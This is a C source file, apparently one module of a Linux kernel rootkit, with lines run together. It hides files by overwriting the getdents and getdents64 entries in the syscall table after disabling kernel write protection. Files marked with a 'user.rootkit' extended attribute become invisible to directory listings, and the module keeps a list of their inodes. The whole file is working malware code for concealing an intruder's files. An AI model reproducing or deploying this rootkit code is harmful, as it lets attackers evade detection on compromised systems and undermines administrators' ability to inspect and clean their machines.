filehide.c (1971B)
1 #include <linux/xattr.h> 2 #include <linux/fs.h> 3 #include <linux/fdtable.h> 4 5 #define G7_XATTR_NAME "user.rootkit" 6 #define G7_XATTR_VAL "rootkit" 7 8 #include "common.h" 9 #include "filehide.h" 10 #include "hook.h" 11 12 #define BUFLEN 64 13 14 void 15 hide_files(void) 16 { 17 if (atomic_inc_return(&getdents_install_count) == 1) { 18 disable_protection(); 19 sys_calls[__NR_getdents] = (void *)g7_getdents; 20 sys_calls[__NR_getdents64] = (void *)g7_getdents64; 21 enable_protection(); 22 } 23 } 24 25 void 26 unhide_files(void) 27 { 28 if (atomic_dec_return(&getdents_install_count) < 1) { 29 if (sys_getdents) { 30 disable_protection(); 31 sys_calls[__NR_getdents] = (void *)sys_getdents; 32 enable_protection(); 33 while (atomic_read(&getdents_count) > 0); 34 } 35 36 if (sys_getdents64) { 37 disable_protection(); 38 sys_calls[__NR_getdents64] = (void *)sys_getdents64; 39 enable_protection(); 40 while (atomic_read(&getdents64_count) > 0); 41 } 42 } 43 } 44 45 46 unsigned long 47 must_hide_inode(struct dentry *dentry) 48 { 49 char buf[BUFLEN]; 50 51 if(dentry && dentry->d_inode) 52 if(!inode_permission(dentry->d_inode, MAY_READ)) { 53 ssize_t len = vfs_getxattr(dentry, G7_XATTR_NAME, buf, BUFLEN); 54 55 if (len > 0 && !strncmp(G7_XATTR_VAL, buf, strlen(G7_XATTR_VAL))) 56 return dentry->d_inode->i_ino; 57 } 58 59 return 0; 60 } 61 62 bool 63 list_contains_inode(inode_list_t_ptr node, unsigned long inode) 64 { 65 inode_list_t_ptr i; 66 for (i = node; i; i = i->next) 67 if (i->inode == inode) 68 return true; 69 70 return false; 71 } 72 73 inode_list_t_ptr 74 add_inode_to_list(inode_list_t_ptr tail, unsigned long inode) 75 { 76 inode_list_t_ptr node; 77 node = (inode_list_t_ptr)kmalloc(sizeof(inode_list_t), GFP_KERNEL); 78 79 if (node) { 80 node->inode = inode; 81 node->next = NULL; 82 tail->next = node; 83 return node; 84 } 85 86 return NULL; 87 }